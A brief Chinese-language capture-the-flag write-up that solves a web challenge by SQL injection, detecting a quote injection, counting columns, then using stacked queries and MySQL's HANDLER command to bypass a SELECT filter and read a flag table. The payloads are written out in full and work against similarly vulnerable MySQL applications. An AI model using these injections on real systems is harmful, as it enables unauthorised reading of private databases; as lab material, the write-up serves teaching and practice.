先点查询1试试:
再试试查询1',看是否存在字符注入:?inject=1'#
利用order by查看有几个字段:?inject=1' order by 3#,?inject=1' order by 2#
可以知道有两个字段,接下来利用联合查询:?inject=1' union select 1,2#
发现select被过滤了,那咱们利用堆叠注入来查看数据库,表名,?inject=1';show databases;#,?inject=1';show tables;#
可以看到有两个表,words和1919810931114514
,查看一下1919810931114514
的字段:?inject=1';show columns from 1919810931114514
;#
由于select被过滤了,我们还可以用handler命令进行查看,handler命令可以一行一行的显示数据表中的内容。?inject=1';handler 1919810931114514
open as a;handler a read next;#,得到flag:flag{0e82a043-614c-4abc-9176-7aa3f04c00e9}